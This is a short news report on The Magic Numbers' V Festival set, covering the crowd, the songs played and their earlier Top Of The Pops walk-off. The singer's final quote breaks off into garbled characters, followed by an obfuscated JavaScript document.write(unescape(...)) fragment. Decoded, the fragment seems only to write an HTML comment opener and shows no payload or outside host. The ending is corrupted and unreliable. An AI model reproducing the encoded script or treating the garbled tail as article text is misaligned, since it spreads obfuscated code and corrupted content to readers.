The Magic Numbers drew their biggest festival audience ever as they took to the Channel 4 stage at the V Festival this afternoon.
The Hanwell four-piece, who are fast becoming the live hit of the summer, brought out the sun as hundreds flocked to see them perform tracks from their self-titled debut.
The 30 minute set proved to be a major triumph for the band following a difficult couple of weeks which has seen the group storm off the set of ‘Top Of The Pops' after presenter Richard Bacon made comments about their weight.
Highlights included a storming rendition of hit single ‘Forever Lost', ‘I See You, You See Me', ‘Mornings Eleven' and ‘Don't Give Up The Fight'.
Singer Romeo Stodart, who was sporting a black jacket and red t-shirt, was overwhelmed by the size of the crowd and just before he performed recent hit single he shouted to the audience: “I think this is the biggest crowd we've ever sang to. Thanks so much for coming down.â€document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
